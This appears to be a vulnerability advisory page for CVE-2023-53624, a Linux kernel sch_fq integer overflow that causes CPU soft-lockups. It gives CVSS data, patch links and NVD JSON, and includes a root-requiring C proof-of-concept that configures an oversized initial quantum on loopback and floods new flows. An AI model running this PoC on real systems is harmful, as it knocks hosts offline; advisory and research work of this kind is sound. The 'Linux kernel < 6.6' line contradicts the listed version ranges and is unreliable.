Security Vulnerability Report
CVE-2023-53624 CVSS 5.5 MEDIUM

Published: 2025-10-07 16:15:45
Last Modified: 2026-02-05 14:32:24
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

net/sched: sch_fq: fix integer overflow of "credit"

if sch_fq is configured with "initial quantum" having values greater than INT_MAX, the first assignment of "credit" does signed integer overflow to a very negative value. In this situation, the syzkaller script provided by Cristoph triggers the CPU soft-lockup warning even with few sockets. It's not an infinite loop, but "credit" wasn't probably meant to be minus 2Gb for each new flow. Capping "initial quantum" to INT_MAX proved to fix the issue.

v2: validation of "initial quantum" is done in fq_policy, instead of open coding in fq_change() _ suggested by Jakub Kicinski

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (>= 3.12, < 5.10.180) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (>= 5.11, < 5.15.111) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (>= 5.16, < 6.1.28) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (>= 6.2, < 6.2.15) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (>= 6.3, < 6.3.2) - VULNERABLE
Linux kernel < 6.6 (all affected versions that include the sch_fq module)
Linux kernel stable branch versions that need the following patches applied:
git.kernel.org/stable/c/2322462d6f9ad4874f4e3c63df3b5cc00cb1acbd
git.kernel.org/stable/c/4b8a05e3801661a0438fcd0cdef181030d966a5a
git.kernel.org/stable/c/4fbefeab88c6e79753a25099d455d3d59d2946b4
git.kernel.org/stable/c/7041101ff6c3073fd8f2e99920f535b111c929cb
git.kernel.org/stable/c/85f24cb2f10b2b0f2882e5786a09b4790bb3a0ad

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// PoC for CVE-2023-53624: Linux kernel sch_fq integer overflow
// Trigger CPU soft-lockup via integer overflow in "credit" variable
// Requires: root or CAP_NET_ADMIN privilege
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>        // htons()
#include <net/if.h>           // if_nametoindex()
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>

// Use 'tc' command to configure sch_fq with overflow value
// This is the primary trigger for the vulnerability
void trigger_overflow() {
    printf("[*] Configuring sch_fq with initial quantum > INT_MAX\n");

    // Add qdisc with fq scheduler
    system("tc qdisc add dev lo root fq");

    // Try to set initial quantum to a value > INT_MAX (2147483647)
    // This will cause signed integer overflow in 'credit'
    system("tc qdisc change dev lo root fq initial_quantum 2147483648");

    printf("[*] Configuration applied, creating traffic to trigger soft-lockup\n");
}

// Create multiple sockets to generate new flows
// Each new flow will use the overflowed credit value
void generate_traffic() {
    int sockets[100];
    struct sockaddr_ll addr;

    memset(&addr, 0, sizeof(addr));
    addr.sll_family = AF_PACKET;
    addr.sll_protocol = htons(ETH_P_IP);
    addr.sll_ifindex = if_nametoindex("lo");

    // Create many packet sockets to trigger flow creation
    for (int i = 0; i < 100; i++) {
        sockets[i] = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_IP));
        if (sockets[i] < 0) {
            perror("socket");
            continue;
        }
        bind(sockets[i], (struct sockaddr *)&addr, sizeof(addr));
    }

    // Send packets to create flows
    for (int i = 0; i < 100; i++) {
        if (sockets[i] >= 0) {
            char buf[64] = "trigger";
            sendto(sockets[i], buf, sizeof(buf), 0,
                   (struct sockaddr *)&addr, sizeof(addr));
        }
    }

    // Cleanup
    for (int i = 0; i < 100; i++) {
        if (sockets[i] >= 0)
            close(sockets[i]);
    }
}

int main() {
    printf("=== CVE-2023-53624 PoC ===\n");
    printf("Linux kernel sch_fq integer overflow\n\n");

    if (getuid() != 0) {
        printf("[!] This PoC requires root privileges (CAP_NET_ADMIN)\n");
        return 1;
    }

    trigger_overflow();
    sleep(1);
    generate_traffic();

    printf("[*] Done. Check dmesg for soft-lockup warnings\n");

    // Cleanup
    system("tc qdisc del dev lo root");
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53624", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:45.190", "lastModified": "2026-02-05T14:32:24.017", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_fq: fix integer overflow of \"credit\"\n\nif sch_fq is configured with \"initial quantum\" having values greater than\nINT_MAX, the first assignment of \"credit\" does signed integer overflow to\na very negative value.\nIn this situation, the syzkaller script provided by Cristoph triggers the\nCPU soft-lockup warning even with few sockets. It's not an infinite loop,\nbut \"credit\" wasn't probably meant to be minus 2Gb for each new flow.\nCapping \"initial quantum\" to INT_MAX proved to fix the issue.\n\nv2: validation of \"initial quantum\" is done in fq_policy, instead of open\n coding in fq_change() _ suggested by Jakub Kicinski"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.12", "versionEndExcluding": "5.10.180", "matchCriteriaId": "9E182C32-07C7-4046-B30D-6715AC884672"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": 
"5.11", "versionEndExcluding": "5.15.111", "matchCriteriaId": "2B9DD776-7F17-4F72-B94F-54BFCBC692DD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.28", "matchCriteriaId": "08F855F4-7188-4EE1-BD79-D4B6C7E2EF54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.15", "matchCriteriaId": "3844A90B-940D-46C3-8D7B-9FF63F1AFC2F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3", "versionEndExcluding": "6.3.2", "matchCriteriaId": "38F6F330-91A0-4675-8B90-6F950471A7CC"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/2322462d6f9ad4874f4e3c63df3b5cc00cb1acbd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/4b8a05e3801661a0438fcd0cdef181030d966a5a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/4fbefeab88c6e79753a25099d455d3d59d2946b4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7041101ff6c3073fd8f2e99920f535b111c929cb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/85f24cb2f10b2b0f2882e5786a09b4790bb3a0ad", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d0b43125ec892aeb1b03e5df5aab595097da225a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}